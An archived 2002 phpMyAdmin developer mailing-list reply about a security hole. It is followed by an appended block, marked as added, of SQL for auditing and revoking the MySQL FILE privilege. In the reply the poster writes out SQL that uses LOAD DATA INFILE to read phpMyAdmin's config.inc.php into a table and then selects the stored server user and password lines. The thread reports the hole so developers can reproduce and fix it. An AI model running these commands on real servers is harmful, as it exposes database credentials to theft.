[Phpmyadmin-devel] Re: MAJOR security hole

Robin Johnson robbat2 at fermi.orbis-terrarum.net
Mon Aug 12 13:13:01 CEST 2002


On Mon, 12 Aug 2002, Marc Delisle wrote:
> > On Mon, 12 Aug 2002, Marc Delisle wrote:
> > > > I've just merged a fix against that, but it needs some testing since I do
> > > > not have a machine here which is affected by this security hole.
> > > you won't like me, but I think we should wait to include a fix for a
> > > "hole" until a developer can reproduce it.
> >
> > I'm going to set up a copy of PMA that exhibits the security hole for us
> > to test out the bug. Give me a day or two, as I have some more pressing work
> > at the moment.
> Robin,
>
> the "goto" problem?
>
> Marc
I've checked out the goto problem, and you were right, it is fixed in the
recent releases. It now limits you to files only in the phpMyAdmin install
directory. Which can still be a problem in itself I think.

On checking out the other problem with systems totally open using the
config mechanism, try out this series of SQL commands:

First time around:
-- scratch table to receive the file, one line per row
CREATE TABLE testB ( t mediumtext );
-- read the phpMyAdmin config file through the MySQL server (needs FILE privilege)
LOAD DATA INFILE '/home/robbat2/public_html/PMA/config.inc.php' INTO TABLE testB FIELDS TERMINATED BY '\n' LINES TERMINATED BY '\n';

Where you need to change the path of the file, and the 'TERMINATED BY'
parts for your own systems.

When that completes, I ran this:
-- pull out only the rows carrying the server login settings
SELECT * FROM testB WHERE t LIKE '%Server%' AND (t LIKE '%user%' OR t LIKE '%password%');

To get just the PMA authentication data.

Of course, this exploit requires that the user have the FILE privilege.
This would apply to all cases where PMA has been set up with the user as
root, or anybody else with the FILE privilege.

I'm carrying on looking for more holes along these lines.

-- 
Robin Hugh Johnson
E-Mail     : robbat2 at orbis-terrarum.net
Home Page  : http://www.orbis-terrarum.net/?l=people.robbat2
ICQ#       : 30269588 or 41961639
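As an added example that is not part of the original message or of phpMyAdmin itself, the checks an administrator would run to find and close the FILE-privilege exposure described above. It assumes a modern MySQL server and a phpMyAdmin login account named 'pma_user'@'localhost' (a placeholder name).

```sql
-- Added example, not from the mailing-list post: audit the FILE privilege
-- that LOAD DATA INFILE depends on and strip it from the phpMyAdmin account.
-- 'pma_user'@'localhost' is a placeholder for the account PMA connects as.

-- 1. Which accounts can make the server read files from its own filesystem?
--    Any row here can attempt LOAD DATA INFILE on files the mysqld OS user can open.
SELECT user, host
FROM mysql.user
WHERE File_priv = 'Y';

-- 2. Where is the server allowed to read from at all?
--    '' (empty) = no restriction, the exposed configuration;
--    a directory = only files under that directory;
--    NULL = server-side file import/export disabled entirely.
SHOW VARIABLES LIKE 'secure_file_priv';

-- 3. FILE is a global privilege and is not needed for browsing or editing
--    databases through phpMyAdmin, so remove it from the account PMA uses.
REVOKE FILE ON *.* FROM 'pma_user'@'localhost';
FLUSH PRIVILEGES;

-- 4. Confirm the account no longer carries FILE (look for it in the output).
SHOW GRANTS FOR 'pma_user'@'localhost';
```

The read only succeeds when the mysqld OS user can open config.inc.php, so restricting that file's permissions to the web-server user is the complementary fix on the filesystem side.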